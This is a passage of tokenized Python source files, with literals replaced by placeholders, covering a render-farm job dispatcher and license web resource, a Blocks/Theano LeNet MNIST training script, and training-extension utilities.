append ( GraphViewBuilder ( self . dispatchTree , graphs ) ) <EOL> def prepare ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def modified ( self ) : <EOL> return bool ( self . dispatchTree . toArchiveElements or <EOL> self . dispatchTree . toCreateElements or <EOL> self . dispatchTree . toModifyElements ) <EOL> def mainLoop ( self ) : <EOL> '''<STR_LIT>''' <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> loopStartTime = time . time ( ) <EOL> prevTimer = loopStartTime <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleDate = loopStartTime <EOL> log . info ( "<STR_LIT>" ) <EOL> log . info ( "<STR_LIT>" ) <EOL> try : <EOL> self . threadPool . poll ( ) <EOL> except NoResultsPending : <EOL> pass <EOL> else : <EOL> log . info ( "<STR_LIT>" ) <EOL> pass <EOL> self . cycle += <NUM_LIT:1> <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . updateRenderNodes ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . dispatchTree . validateDependencies ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . updateDB ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . 
theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> assignments = self . computeAssignments ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . sendAssignments ( assignments ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> singletonstats . theStats . cycleCounts [ '<STR_LIT>' ] = len ( assignments ) <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> , len ( assignments ) ) ) <EOL> prevTimer = time . time ( ) <EOL> for renderNode in self . dispatchTree . renderNodes . values ( ) : <EOL> renderNode . releaseFinishingStatus ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> loopDuration = ( time . time ( ) - loopStartTime ) * <NUM_LIT:1000> <EOL> log . info ( "<STR_LIT>" % loopDuration ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - loopStartTime <EOL> singletonstats . theStats . aggregate ( ) <EOL> def updateDB ( self ) : <EOL> if settings . DB_ENABLE : <EOL> self . pulidb . createElements ( self . dispatchTree . toCreateElements ) <EOL> self . pulidb . updateElements ( self . dispatchTree . toModifyElements ) <EOL> self . pulidb . archiveElements ( self . dispatchTree . toArchiveElements ) <EOL> self . 
dispatchTree . resetDbElements ( ) <EOL> def computeAssignments ( self ) : <EOL> '''<STR_LIT>''' <EOL> LOGGER = logging . getLogger ( '<STR_LIT>' ) <EOL> from . model . node import NoRenderNodeAvailable , NoLicenseAvailableForTask <EOL> if not any ( rn . isAvailable ( ) for rn in self . dispatchTree . renderNodes . values ( ) ) : <EOL> return [ ] <EOL> entryPoints = set ( [ poolShare . node for poolShare in self . dispatchTree . poolShares . values ( ) <EOL> if poolShare . node . status not in ( NODE_BLOCKED , NODE_DONE , NODE_CANCELED , NODE_PAUSED ) and poolShare . node . readyCommandCount > <NUM_LIT:0> and poolShare . node . name != '<STR_LIT>' ] ) <EOL> isRenderNodesAvailable = False <EOL> for pool , jobsIterator in groupby ( entryPoints , lambda x : x . mainPoolShare ( ) . pool ) : <EOL> renderNodesAvailable = set ( [ rn for rn in pool . renderNodes if rn . status not in [ RN_UNKNOWN , RN_PAUSED , RN_WORKING ] ] ) <EOL> if len ( renderNodesAvailable ) : <EOL> isRenderNodesAvailable = True <EOL> break <EOL> if not isRenderNodesAvailable : <EOL> return [ ] <EOL> prevTimer = time . time ( ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . mainPoolShare ( ) . pool ) <EOL> for pool , jobsIterator in groupby ( entryPoints , lambda x : x . mainPoolShare ( ) . pool ) : <EOL> jobsList = [ job for job in jobsIterator ] <EOL> onlineRenderNodes = set ( [ rn for rn in pool . renderNodes if rn . status not in [ RN_UNKNOWN , RN_PAUSED ] ] ) <EOL> nbOnlineRenderNodes = len ( onlineRenderNodes ) <EOL> l = jobsList [ : ] <EOL> for job in l : <EOL> if job . mainPoolShare ( ) . userDefinedMaxRN and job . mainPoolShare ( ) . maxRN not in [ - <NUM_LIT:1> , <NUM_LIT:0> ] : <EOL> jobsList . remove ( job ) <EOL> nbOnlineRenderNodes -= job . mainPoolShare ( ) . maxRN <EOL> if len ( jobsList ) == <NUM_LIT:0> : <EOL> continue <EOL> dkList = [ job . 
dispatchKey for job in jobsList ] <EOL> nbJobs = len ( jobsList ) <EOL> nbRNAssigned = <NUM_LIT:0> <EOL> dkMin = min ( dkList ) <EOL> dkPositiveList = map ( lambda x : x - dkMin + <NUM_LIT:1> , dkList ) <EOL> dkSum = sum ( dkPositiveList ) <EOL> jobsList = sorted ( jobsList , key = lambda x : x . id ) <EOL> jobsList = sorted ( jobsList , key = lambda x : x . dispatchKey , reverse = True ) <EOL> for dk , jobIterator in groupby ( jobsList , lambda x : x . dispatchKey ) : <EOL> jobs = [ job for job in jobIterator ] <EOL> dkPositive = dk - dkMin + <NUM_LIT:1> <EOL> updatedmaxRN = int ( round ( nbOnlineRenderNodes * ( dkPositive / float ( dkSum ) ) ) ) <EOL> for job in jobs : <EOL> job . mainPoolShare ( ) . maxRN = updatedmaxRN <EOL> nbRNAssigned += updatedmaxRN <EOL> unassignedRN = nbOnlineRenderNodes - nbRNAssigned <EOL> while unassignedRN > <NUM_LIT:0> : <EOL> for job in jobsList : <EOL> if unassignedRN <= <NUM_LIT:0> : <EOL> break <EOL> job . mainPoolShare ( ) . maxRN += <NUM_LIT:1> <EOL> unassignedRN -= <NUM_LIT:1> <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . assignmentTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> LOGGER . info ( "<STR_LIT>" , ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . id ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . dispatchKey , reverse = True ) <EOL> userDefEntryPoints = ifilter ( lambda node : node . mainPoolShare ( ) . userDefinedMaxRN , entryPoints ) <EOL> standardEntryPoints = ifilter ( lambda node : not node . mainPoolShare ( ) . userDefinedMaxRN , entryPoints ) <EOL> scoredEntryPoints = chain ( userDefEntryPoints , standardEntryPoints ) <EOL> prevTimer = time . time ( ) <EOL> assignments = [ ] <EOL> for entryPoint in scoredEntryPoints : <EOL> if not any ( [ poolShare . hasRenderNodesAvailable ( ) for poolShare in entryPoint . poolShares . 
values ( ) ] ) : <EOL> continue <EOL> try : <EOL> for ( rn , com ) in entryPoint . dispatchIterator ( lambda : self . queue . qsize ( ) > <NUM_LIT:0> ) : <EOL> assignments . append ( ( rn , com ) ) <EOL> entryPoint . mainPoolShare ( ) . allocatedRN += <NUM_LIT:1> <EOL> rn . currentpoolshare = entryPoint . mainPoolShare ( ) <EOL> except NoRenderNodeAvailable : <EOL> pass <EOL> except NoLicenseAvailableForTask : <EOL> LOGGER . info ( "<STR_LIT>" % entryPoint . name ) <EOL> pass <EOL> assignmentDict = collections . defaultdict ( list ) <EOL> for ( rn , com ) in assignments : <EOL> assignmentDict [ rn ] . append ( com ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . assignmentTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> LOGGER . info ( "<STR_LIT>" , ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) <EOL> return assignmentDict . items ( ) <EOL> def updateRenderNodes ( self ) : <EOL> for rendernode in self . dispatchTree . renderNodes . values ( ) : <EOL> rendernode . updateStatus ( ) <EOL> def sendAssignments ( self , assignmentList ) : <EOL> '''<STR_LIT>''' <EOL> def sendAssignment ( args ) : <EOL> rendernode , commands = args <EOL> failures = [ ] <EOL> for command in commands : <EOL> headers = { } <EOL> if not rendernode . idInformed : <EOL> headers [ "<STR_LIT>" ] = rendernode . id <EOL> root = command . task <EOL> ancestors = [ root ] <EOL> while root . parent : <EOL> root = root . parent <EOL> ancestors . append ( root ) <EOL> arguments = { } <EOL> environment = { <EOL> '<STR_LIT>' : command . task . user , <EOL> '<STR_LIT>' : unicode ( rendernode . usedRam [ command . id ] ) , <EOL> '<STR_LIT>' : unicode ( rendernode . usedCoresNumber [ command . id ] ) , <EOL> } <EOL> for ancestor in ancestors : <EOL> arguments . update ( ancestor . arguments ) <EOL> environment . update ( ancestor . environment ) <EOL> arguments . update ( command . arguments ) <EOL> log = logging . 
getLogger ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" % ( command . id , command . task . name , rendernode ) ) <EOL> commandDict = { <EOL> "<STR_LIT:id>" : command . id , <EOL> "<STR_LIT>" : str ( command . task . runner ) , <EOL> "<STR_LIT>" : arguments , <EOL> "<STR_LIT>" : command . task . validationExpression , <EOL> "<STR_LIT>" : command . task . name , <EOL> "<STR_LIT>" : "<STR_LIT>" % command . task . id , <EOL> "<STR_LIT>" : environment , <EOL> "<STR_LIT>" : command . runnerPackages , <EOL> "<STR_LIT>" : command . watcherPackages <EOL> } <EOL> body = json . dumps ( commandDict ) <EOL> headers [ "<STR_LIT>" ] = len ( body ) <EOL> headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> try : <EOL> resp , data = rendernode . request ( "<STR_LIT:POST>" , "<STR_LIT>" , body , headers ) <EOL> if not resp . status == <NUM_LIT> : <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( "<STR_LIT>" , command . id , rendernode . name ) <EOL> failures . append ( ( rendernode , command ) ) <EOL> else : <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" , command . id , rendernode . name ) <EOL> except rendernode . RequestFailed , e : <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( "<STR_LIT>" , command . id , rendernode . name , e ) <EOL> failures . append ( ( rendernode , command ) ) <EOL> return failures <EOL> requests = makeRequests ( sendAssignment , [ [ a , b ] for ( a , b ) in assignmentList ] , self . _assignmentFailed ) <EOL> for request in requests : <EOL> self . threadPool . putRequest ( request ) <EOL> def _assignmentFailed ( self , request , failures ) : <EOL> for assignment in failures : <EOL> rendernode , command = assignment <EOL> rendernode . clearAssignment ( command ) <EOL> command . clearAssignment ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( command . id , rendernode . name ) ) <EOL> def handleNewGraphRequestApply ( self , graph ) : <EOL> '''<STR_LIT>''' <EOL> prevTimer = time . 
time ( ) <EOL> nodes = self . dispatchTree . registerNewGraph ( graph ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> for node in nodes : <EOL> try : <EOL> if node . tags [ '<STR_LIT>' ] == '<STR_LIT:true>' or node . tags [ '<STR_LIT>' ] == True : <EOL> node . setPaused ( True ) <EOL> except KeyError : <EOL> continue <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( '<STR_LIT>' % graph [ '<STR_LIT:name>' ] ) <EOL> return nodes <EOL> def updateCommandApply ( self , dct ) : <EOL> '''<STR_LIT>''' <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> commandId = dct [ '<STR_LIT:id>' ] <EOL> renderNodeName = dct [ '<STR_LIT>' ] <EOL> try : <EOL> command = self . dispatchTree . commands [ commandId ] <EOL> except KeyError : <EOL> raise KeyError ( "<STR_LIT>" % commandId ) <EOL> if not command . renderNode : <EOL> raise KeyError ( "<STR_LIT>" % ( commandId , int ( dct [ '<STR_LIT:status>' ] ) , renderNodeName ) ) <EOL> elif command . renderNode . name != renderNodeName : <EOL> log . warning ( "<STR_LIT>" % ( renderNodeName , command . renderNode . name ) ) <EOL> raise KeyError ( "<STR_LIT>" % ( commandId , renderNodeName , command . renderNode . name ) ) <EOL> rn = command . renderNode <EOL> rn . lastAliveTime = max ( time . time ( ) , rn . lastAliveTime ) <EOL> if commandId not in rn . commands : <EOL> if len ( rn . commands ) == <NUM_LIT:0> and command . status is not enums . CMD_CANCELED : <EOL> rn . commands [ commandId ] = command <EOL> rn . reserveLicense ( command , self . licenseManager ) <EOL> log . warning ( "<STR_LIT>" % ( commandId , rn . name ) ) <EOL> if "<STR_LIT:status>" in dct : <EOL> command . status = int ( dct [ '<STR_LIT:status>' ] ) <EOL> if "<STR_LIT>" in dct and command . 
status == enums . CMD_RUNNING : <EOL> command . completion = float ( dct [ '<STR_LIT>' ] ) <EOL> command . message = dct [ '<STR_LIT:message>' ] <EOL> if "<STR_LIT>" in dct : <EOL> command . validatorMessage = dct [ '<STR_LIT>' ] <EOL> command . errorInfos = dct [ '<STR_LIT>' ] <EOL> if command . validatorMessage : <EOL> command . status = enums . CMD_ERROR <EOL> if "<STR_LIT>" in dct and dct [ "<STR_LIT>" ] is not None : <EOL> command . stats = dct [ "<STR_LIT>" ] <EOL> def queueWorkload ( self , workload ) : <EOL> self . queue . put ( workload ) </s>
<s> '''<STR_LIT>''' <EOL> from octopus . core . framework import ResourceNotFoundError <EOL> from octopus . dispatcher . webservice import DispatcherBaseResource <EOL> from octopus . core . communication . http import Http404 , Http500 <EOL> class LicensesResource ( DispatcherBaseResource ) : <EOL> def get ( self ) : <EOL> self . writeCallback ( repr ( self . dispatcher . licenseManager ) ) <EOL> class LicenseResource ( DispatcherBaseResource ) : <EOL> def get ( self , licenseName ) : <EOL> try : <EOL> lic = self . dispatcher . licenseManager . licenses [ licenseName ] <EOL> licenseRepr = "<STR_LIT>" % ( str ( lic . maximum ) , str ( lic . used ) ) <EOL> for rn in sorted ( lic . currentUsingRenderNodes ) : <EOL> licenseRepr += "<STR_LIT>" % rn . name <EOL> licenseRepr += "<STR_LIT>" <EOL> self . writeCallback ( licenseRepr ) <EOL> except KeyError : <EOL> raise ResourceNotFoundError <EOL> def put ( self , licenseName ) : <EOL> data = self . getBodyAsJSON ( ) <EOL> try : <EOL> maxLic = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> else : <EOL> self . dispatcher . licenseManager . setMaxLicensesNumber ( licenseName , maxLic ) <EOL> self . writeCallback ( "<STR_LIT:OK>" ) <EOL> def delete ( self , licenseName ) : <EOL> data = self . getBodyAsJSON ( ) <EOL> try : <EOL> rns = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> else : <EOL> rnsList = rns . split ( "<STR_LIT:U+002C>" ) <EOL> for rnName in rnsList : <EOL> if rnName in self . dispatcher . dispatchTree . renderNodes : <EOL> rn = self . dispatcher . dispatchTree . renderNodes [ rnName ] <EOL> else : <EOL> raise Http500 ( "<STR_LIT>" % ( rnName ) ) <EOL> self . dispatcher . licenseManager . releaseLicenseForRenderNode ( licenseName , rn ) <EOL> self . writeCallback ( "<STR_LIT:OK>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import numpy <EOL> from argparse import ArgumentParser <EOL> from theano import tensor <EOL> from blocks . algorithms import GradientDescent , Scale <EOL> from blocks . bricks import ( MLP , Rectifier , Initializable , FeedforwardSequence , <EOL> Softmax , Activation ) <EOL> from blocks . bricks . conv import ( Convolutional , ConvolutionalSequence , <EOL> Flattener , MaxPooling ) <EOL> from blocks . bricks . cost import CategoricalCrossEntropy , MisclassificationRate <EOL> from blocks . extensions import FinishAfter , Timing , Printing , ProgressBar <EOL> from blocks . extensions . monitoring import ( DataStreamMonitoring , <EOL> TrainingDataMonitoring ) <EOL> from blocks . extensions . saveload import Checkpoint <EOL> from blocks . graph import ComputationGraph <EOL> from blocks . initialization import Constant , Uniform <EOL> from blocks . main_loop import MainLoop <EOL> from blocks . model import Model <EOL> from blocks . monitoring import aggregation <EOL> from fuel . datasets import MNIST <EOL> from fuel . schemes import ShuffledScheme <EOL> from fuel . streams import DataStream <EOL> from toolz . itertoolz import interleave <EOL> class LeNet ( FeedforwardSequence , Initializable ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , conv_activations , num_channels , image_shape , <EOL> filter_sizes , feature_maps , pooling_sizes , <EOL> top_mlp_activations , top_mlp_dims , <EOL> conv_step = None , border_mode = '<STR_LIT>' , ** kwargs ) : <EOL> if conv_step is None : <EOL> self . conv_step = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> else : <EOL> self . conv_step = conv_step <EOL> self . num_channels = num_channels <EOL> self . image_shape = image_shape <EOL> self . top_mlp_activations = top_mlp_activations <EOL> self . top_mlp_dims = top_mlp_dims <EOL> self . border_mode = border_mode <EOL> conv_parameters = zip ( filter_sizes , feature_maps ) <EOL> self . 
layers = list ( interleave ( [ <EOL> ( Convolutional ( filter_size = filter_size , <EOL> num_filters = num_filter , <EOL> step = self . conv_step , <EOL> border_mode = self . border_mode , <EOL> name = '<STR_LIT>' . format ( i ) ) <EOL> for i , ( filter_size , num_filter ) <EOL> in enumerate ( conv_parameters ) ) , <EOL> conv_activations , <EOL> ( MaxPooling ( size , name = '<STR_LIT>' . format ( i ) ) <EOL> for i , size in enumerate ( pooling_sizes ) ) ] ) ) <EOL> self . conv_sequence = ConvolutionalSequence ( self . layers , num_channels , <EOL> image_size = image_shape ) <EOL> self . top_mlp = MLP ( top_mlp_activations , top_mlp_dims ) <EOL> self . flattener = Flattener ( ) <EOL> application_methods = [ self . conv_sequence . apply , self . flattener . apply , <EOL> self . top_mlp . apply ] <EOL> super ( LeNet , self ) . __init__ ( application_methods , ** kwargs ) <EOL> @ property <EOL> def output_dim ( self ) : <EOL> return self . top_mlp_dims [ - <NUM_LIT:1> ] <EOL> @ output_dim . setter <EOL> def output_dim ( self , value ) : <EOL> self . top_mlp_dims [ - <NUM_LIT:1> ] = value <EOL> def _push_allocation_config ( self ) : <EOL> self . conv_sequence . _push_allocation_config ( ) <EOL> conv_out_dim = self . conv_sequence . get_dim ( '<STR_LIT>' ) <EOL> self . top_mlp . activations = self . top_mlp_activations <EOL> self . top_mlp . dims = [ numpy . prod ( conv_out_dim ) ] + self . 
top_mlp_dims <EOL> def main ( save_to , num_epochs , feature_maps = None , mlp_hiddens = None , <EOL> conv_sizes = None , pool_sizes = None , batch_size = <NUM_LIT> , <EOL> num_batches = None ) : <EOL> if feature_maps is None : <EOL> feature_maps = [ <NUM_LIT:20> , <NUM_LIT:50> ] <EOL> if mlp_hiddens is None : <EOL> mlp_hiddens = [ <NUM_LIT> ] <EOL> if conv_sizes is None : <EOL> conv_sizes = [ <NUM_LIT:5> , <NUM_LIT:5> ] <EOL> if pool_sizes is None : <EOL> pool_sizes = [ <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> image_size = ( <NUM_LIT> , <NUM_LIT> ) <EOL> output_size = <NUM_LIT:10> <EOL> conv_activations = [ Rectifier ( ) for _ in feature_maps ] <EOL> mlp_activations = [ Rectifier ( ) for _ in mlp_hiddens ] + [ Softmax ( ) ] <EOL> convnet = LeNet ( conv_activations , <NUM_LIT:1> , image_size , <EOL> filter_sizes = zip ( conv_sizes , conv_sizes ) , <EOL> feature_maps = feature_maps , <EOL> pooling_sizes = zip ( pool_sizes , pool_sizes ) , <EOL> top_mlp_activations = mlp_activations , <EOL> top_mlp_dims = mlp_hiddens + [ output_size ] , <EOL> border_mode = '<STR_LIT>' , <EOL> weights_init = Uniform ( width = <NUM_LIT> ) , <EOL> biases_init = Constant ( <NUM_LIT:0> ) ) <EOL> convnet . push_initialization_config ( ) <EOL> convnet . layers [ <NUM_LIT:0> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . layers [ <NUM_LIT:1> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . top_mlp . linear_transformations [ <NUM_LIT:0> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . top_mlp . linear_transformations [ <NUM_LIT:1> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . initialize ( ) <EOL> logging . info ( "<STR_LIT>" . format ( <EOL> * convnet . children [ <NUM_LIT:0> ] . get_dim ( '<STR_LIT>' ) ) ) <EOL> for i , layer in enumerate ( convnet . layers ) : <EOL> if isinstance ( layer , Activation ) : <EOL> logging . info ( "<STR_LIT>" . format ( <EOL> i , layer . __class__ . __name__ ) ) <EOL> else : <EOL> logging . 
info ( "<STR_LIT>" . format ( <EOL> i , layer . __class__ . __name__ , * layer . get_dim ( '<STR_LIT>' ) ) ) <EOL> x = tensor . tensor4 ( '<STR_LIT>' ) <EOL> y = tensor . lmatrix ( '<STR_LIT>' ) <EOL> probs = convnet . apply ( x ) <EOL> cost = ( CategoricalCrossEntropy ( ) . apply ( y . flatten ( ) , probs ) <EOL> . copy ( name = '<STR_LIT>' ) ) <EOL> error_rate = ( MisclassificationRate ( ) . apply ( y . flatten ( ) , probs ) <EOL> . copy ( name = '<STR_LIT>' ) ) <EOL> cg = ComputationGraph ( [ cost , error_rate ] ) <EOL> mnist_train = MNIST ( ( "<STR_LIT:train>" , ) ) <EOL> mnist_train_stream = DataStream . default_stream ( <EOL> mnist_train , iteration_scheme = ShuffledScheme ( <EOL> mnist_train . num_examples , batch_size ) ) <EOL> mnist_test = MNIST ( ( "<STR_LIT:test>" , ) ) <EOL> mnist_test_stream = DataStream . default_stream ( <EOL> mnist_test , <EOL> iteration_scheme = ShuffledScheme ( <EOL> mnist_test . num_examples , batch_size ) ) <EOL> algorithm = GradientDescent ( <EOL> cost = cost , parameters = cg . parameters , <EOL> step_rule = Scale ( learning_rate = <NUM_LIT:0.1> ) ) <EOL> extensions = [ Timing ( ) , <EOL> FinishAfter ( after_n_epochs = num_epochs , <EOL> after_n_batches = num_batches ) , <EOL> DataStreamMonitoring ( <EOL> [ cost , error_rate ] , <EOL> mnist_test_stream , <EOL> prefix = "<STR_LIT:test>" ) , <EOL> TrainingDataMonitoring ( <EOL> [ cost , error_rate , <EOL> aggregation . mean ( algorithm . total_gradient_norm ) ] , <EOL> prefix = "<STR_LIT:train>" , <EOL> after_epoch = True ) , <EOL> Checkpoint ( save_to ) , <EOL> ProgressBar ( ) , <EOL> Printing ( ) ] <EOL> model = Model ( cost ) <EOL> main_loop = MainLoop ( <EOL> algorithm , <EOL> mnist_train_stream , <EOL> model = model , <EOL> extensions = extensions ) <EOL> main_loop . run ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> parser = ArgumentParser ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . 
add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:2> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , default = "<STR_LIT>" , nargs = "<STR_LIT:?>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , <EOL> default = [ <NUM_LIT:20> , <NUM_LIT:50> ] , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT> ] , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT:5> , <NUM_LIT:5> ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT> , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> main ( ** vars ( args ) ) </s>
<s> import numpy <EOL> def check_valid_permutation ( permutation ) : <EOL> """<STR_LIT>""" <EOL> permutation = numpy . asarray ( permutation ) <EOL> if permutation . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif permutation . dtype . kind != '<STR_LIT:i>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif ( len ( set ( permutation ) ) != max ( permutation ) + <NUM_LIT:1> or <EOL> min ( permutation ) < <NUM_LIT:0> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return permutation </s>
<s> from __future__ import print_function <EOL> import logging <EOL> from abc import ABCMeta , abstractmethod <EOL> import progressbar <EOL> from six import add_metaclass <EOL> from toolz import first <EOL> logger = logging . getLogger ( __name__ ) <EOL> def callback ( func ) : <EOL> func . _is_callback = True <EOL> return func <EOL> class TrainingExtension ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None ) : <EOL> if not name : <EOL> name = self . __class__ . __name__ <EOL> self . name = name <EOL> @ property <EOL> def main_loop ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . _main_loop <EOL> @ main_loop . setter <EOL> def main_loop ( self , value ) : <EOL> self . _main_loop = value <EOL> def dispatch ( self , callback_name , * args ) : <EOL> """<STR_LIT>""" <EOL> getattr ( self , str ( callback_name ) ) ( * args ) <EOL> @ callback <EOL> def on_resumption ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def on_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_training ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_batch ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_batch ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_training ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def on_interrupt ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CallbackName ( str ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> callback_names = [ key for key , value <EOL> in TrainingExtension . __dict__ . 
items ( ) <EOL> if getattr ( value , '<STR_LIT>' , False ) ] <EOL> if other not in callback_names : <EOL> raise TypeError ( "<STR_LIT>" . format ( other ) ) <EOL> return str ( self ) == other <EOL> class Predicate ( object ) : <EOL> def __init__ ( self , condition , num ) : <EOL> self . condition = condition <EOL> self . num = num <EOL> def __call__ ( self , log ) : <EOL> if self . condition . endswith ( '<STR_LIT>' ) : <EOL> entry = log . status [ '<STR_LIT>' ] <EOL> else : <EOL> entry = log . status [ '<STR_LIT>' ] <EOL> if self . condition . startswith ( '<STR_LIT>' ) : <EOL> return entry % self . num == <NUM_LIT:0> <EOL> else : <EOL> return entry == self . num <EOL> def has_done_epochs ( log ) : <EOL> return log . status [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def always_true ( log ) : <EOL> return True <EOL> @ add_metaclass ( ABCMeta ) <EOL> class SimpleExtension ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> BOOLEAN_TRIGGERS = frozenset ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> 